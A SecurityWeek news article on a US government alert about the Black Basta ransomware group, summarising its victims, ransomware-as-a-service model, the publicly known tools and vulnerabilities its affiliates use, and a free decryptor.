Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Ransomware

Black Basta Ransomware Hit Over 500 Organizations

The US government warns of Black Basta ransomware attacks targeting critical infrastructure organizations.

The Black Basta ransomware group has hit more than 500 organizations globally, including critical infrastructure entities in North America, Europe, and Australia, the US government warns.

First identified in April 2022, Black Basta has been operating under the ransomware-as-a-service (RaaS) business model, where affiliates conduct cyberattacks, deploy malware against victim organizations, and collect a percentage of the ransom payment.

In a November 2023 report, blockchain analytics firm Elliptic estimated that Black Basta affiliates had received over $100 million in ransom payments from at least 90 victim organizations.

According to a new alert from CISA, the FBI, the Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Black Basta affiliates have conducted attacks against 12 out of 16 critical infrastructure sectors, including healthcare organizations.

For initial access, the cybercriminals rely on phishing and the exploitation of known vulnerabilities, such as CVE-2024-1709, a critical ConnectWise ScreenConnect flaw that started being exploited only days after it was publicly disclosed on February 19.

After compromising a victim’s network, the attackers deploy various tools for remote access, network scanning, lateral movement, privilege escalation, and data exfiltration, including SoftPerfect, BITSAdmin, PsExec, Mimikatz, and RClone.

The Black Basta affiliates were also observed exploiting vulnerabilities such as ZeroLogon, NoPac, and PrintNightmare for privilege escalation, abusing Remote Desktop Protocol (RDP) for lateral movement, and deploying the Backstab tool to disable endpoint detection and response (EDR) solutions.

After exfiltrating the victim’s data, the attackers delete volume shadow copies to hinder recovery, deploy ransomware to encrypt the compromised systems, and drop a ransom note.

Advertisement. Scroll to continue reading.

The new alert from CISA, FBI, HHS, and MS-ISAC provides details on the tactics, techniques, and procedures (TTPs) employed by Black Basta affiliates, indicators of compromise (IoCs), and recommended mitigations.

“Healthcare organizations are attractive targets for cybercrime actors due to their size, technological dependence, access to personal health information, and unique impacts from patient care disruptions. The authoring organizations urge the HPH sector and all critical infrastructure organizations to apply the recommendations in the mitigations section to reduce the likelihood of compromise from Black Basta and other ransomware attacks,” the four government agencies note.

In January 2024, hacking research collective and consulting think tank SRLabs released a free decryptor to help Black Basta victims recover their data without paying a ransom.

Related: Free Decryptor Released for Black Basta Ransomware

Related: Black Basta Ransomware Linked to FIN7 Cybercrime Group

Related: New Black Basta Ransomware Possibly Linked to Conti Group

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

The AI Risk Summit brings together security and risk management executives, AI researchers, policy makers, software developers and influential business and government stakeholders.

Register

People on the Move

Fastly announced that Scott Lovett will join the company as Chief Revenue Officer, effective June 3, 2024.

Digital transformation consulting firm Synechron has hired Aaron Momin as CISO.

Wendy Zheng named as CFO and Joe Diamond as CMO at cyber asset management firm Axonius.

More People On The Move

Expert Insights